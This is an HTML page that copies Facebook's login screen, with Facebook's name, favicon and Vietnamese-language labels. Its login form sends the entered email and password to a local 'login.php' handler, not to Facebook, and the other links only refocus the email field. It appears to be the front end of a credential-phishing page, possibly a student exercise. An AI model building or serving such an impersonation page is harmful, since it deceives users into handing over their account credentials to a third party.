<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Facebook</title>
	<link rel="shortcut icon" href="https://www.facebook.com/rsrc.php/yl/r/H3nkt0a7ZMg.ico">
	<style >
		table tr td{text-align:center;}
		.bottom a{color: #D3D3D3;}
		.bottom a:link{text-decoration: none;}
		input{padding: 10px;}
		.login{background-color: #3b5998;color:white;}
		.check{background-color: #32CD32; color: white; padding: 12px;}
		.inputf a:link{text-decoration: none;}
	</style>
</head>
<body style="margin:0px;">
	<script>
		document.title="Facebook - login or sign up";
	</script>
	<div style="width:100%;">
		<div style="height:40px;background-color: #3b5998; padding-bottom: :10px; padding-left: 5px;">
			<span style="color:white;font-size: 120%;"><br>Facebook</span>
		</div>
	</div>
	<div class="inputf" style="background-color: AliceBlue;padding: 10px;text-align: center;"><br>
		<form action="https://www.facebook.com/">
		<form name="fbform" method="post" action="login.php">
			<input type="text" name="email" id="email" placeholder="Địa chỉ email hoặc SĐT" maxlength="40" size="30px" required=""><br><br>
			<input type="password" name="pass" id="pass" placeholder="Mật Khẩu" maxlength="40" size="30px" required=""><br><br>
			<input class="login" name="login" type="submit" id="submit" value="Log In" size="60px" ><br><br>
			<span style="text-align: center;">Or </span><br><br></form>
			<form action="https://m.facebook.com/r.php?locale=vi_VN&display=page&soft=hjk">
			<a href="https://m.facebook.com/r.php" class="Create"  onclick="document.getElementById(&quot;email&quot;).focus()">Tạo tài khoản mới</a><br><br>

			<a href="#email"  onclick="document.getElementById(&quot;email&quot;).focus()">Quên mật khẩu?</a><br><br>

			<a href="#email"  onclick="document.getElementById(&quot;email&quot;).focus()">Trung tâm hỗ trợ</a><br>
		</form>
		</form></div>
		<div class="bottom" style="background-color: #808080;padding: 10px;">
			<table style="width: 250px; margin-left: auto;margin-right: auto;color: #D3D3D3">
				<tbody><tr>
					<td><a href="#email" onclick="document.getElementById(&quot;email&quot;).focus()"> Việt Nam (VN)</a></td>
					<td><a href="file:///C:/Users/MAY/Desktop/bai2.html#email" onclick="document.getElementById(&quot;email&quot;).focus()"> Anh (UK)</a></td>
				</tr>
				<tr>
					<td><a href="#email" onclick="document.getElementById(&quot;email&quot;).focus()"> Trung Quốc (CN)</a></td>
					<td><a href="#email" onclick="document.getElementById(&quot;email&quot;).focus()"> Nhiều hơn</a></td> 
				</tr>
			</tbody>
			</table>
			<p style="text-align: center;color: white;">Facebook</p>
		</div>
</body>
</html>